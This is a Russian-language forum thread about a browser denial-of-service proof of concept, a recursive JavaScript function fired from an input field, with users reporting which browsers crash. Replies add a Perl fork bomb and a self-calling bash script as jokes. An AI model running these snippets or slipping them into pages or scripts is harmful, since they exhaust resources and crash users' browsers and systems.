PoC exploit:

<script>
function owned(){

setTimeout("owned()",1000);
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">

Протестироваться можно здесь: http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html

Багу нашел Michal Bucko.

PoC exploit:

<script>
function owned(){

setTimeout("owned()",1000);
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">

Протестироваться можно здесь: http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html

Багу нашел Michal Bucko.

мде =\ 4ё-то кодеры это не учли =\
Наверно в следующем апдейте исправят

Наверно в следующем апдейте исправят
Не наверное, а точнО! Все что сделано руками, человека. Всегда будут баги.

myIE тоже бьет =)

Arvi The Fakep
взял и обидел лисичку

мля ждем патча... пока слезу на оперу...

хмм... у меня Portable Firefox - не пашет чтота =)

хмм... у меня Portable Firefox - не пашет чтота =)
Если мне память не изменяет то он с 1.5 делался, а не с двойки и вроде бы не обновлялся.(могу ошибаться)

Мда.

/me нашел мега-пупер-супер багу в перле


while (1) { fork; }

opera
Версия 9.0
Сборка 8031
упала :(((

Огненый лисиц
1,5 бета 2, выстоял, не посрамив рудой хвост :)

осел намбер 6 упал сразу....

Opera
9.00 Beta
Build
8359
зашел на страницу, ждал ждал ничего не происходило посомтрел процес опера жрала 90 процентов =), но все равно все нормально грузилось правда с торможением =)

Тоже мне багу нашли.
Я тоже такую в линуксе нашел, ага:

script:
#!/bin/bash
./script

$ chmod +x script
$ ./script

Тоже мне багу нашли.
Я тоже такую в линуксе нашел, ага:

script:
#!/bin/bash
./script

$ chmod +x script
$ ./script

При нормальных настройках системы не поможет: процесс сразу в минмальный приоритет уйдет.

ну на новых системах это не поможет.

а на старых поможет и еще как, это же саморазмножающийся скрипт :)

']мля ждем патча... пока слезу на оперу...
Так ето ж всего навсего отказ в обслуживании и всё... Тут ИМХо не очень страшно -ето ж не дыры в осле,с помощью которых можно подцепить что угодно =))

что за бред. Ещё эксплойтом назвали.

ну на новых системах это не поможет.

а на старых поможет и еще как, это же саморазмножающийся скрипт Что значит на новых и на старых?
тут только от того, как система настроена, зависит.
в том же древнем Alt Linux 2.4 у тебя такое не выйдет, т.к. система из коробки не имеет секурити-дефектов(кроме как старый софт, но ранье то он был новый)